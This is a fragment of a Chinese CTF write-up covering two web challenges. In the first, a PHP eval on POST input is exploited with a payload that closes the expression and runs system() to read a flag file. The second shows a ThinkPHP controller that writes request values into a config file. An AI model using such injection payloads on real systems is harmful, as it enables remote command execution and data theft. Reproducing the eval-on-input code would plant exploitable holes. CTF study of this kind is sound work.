CodeInject
1
2
3
4
5
6
7
8
| <?php
error_reporting(0);
show_source(__FILE__);
eval("var_dump((Object)$_POST[1]);");
|
这里的话会将传入的内容转化成对象,这里的话尝试闭合就行
1
| 1=1);system("cat /000f1ag.txt");#
|
tpdoor
页面提示缓存被禁用
这图标是tp的,先审一下源码吧
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| <?php
namespace app\controller;
use app\BaseController;
use think\facade\Db;
class Index extends BaseController
{
protected $middleware = ['think\middleware\AllowCrossDomain','think\middleware\CheckRequestCache','think\middleware\LoadLangPack','think\middleware\SessionInit'];
public function index($isCache = false , $cacheTime = 3600)
{
if($isCache == true){
$config = require __DIR__.'/../../config/route.php';
$config['request_cache_key'] = $isCache;
$config['request_cache_expire'] = intval($cacheTime);
$config['request_cache_except'] = [];
file_put_contents(__DIR__.'/../../config/route.php', '<?php return '. var_export($config, true). ';');
return 'cache is enabled';
}else{
return 'Welcome ,cache is disabled';
}
}
}
|
说实话这个源码给的不全,得自己去翻官方手册了,这里的话是需要让$isCache设置为true
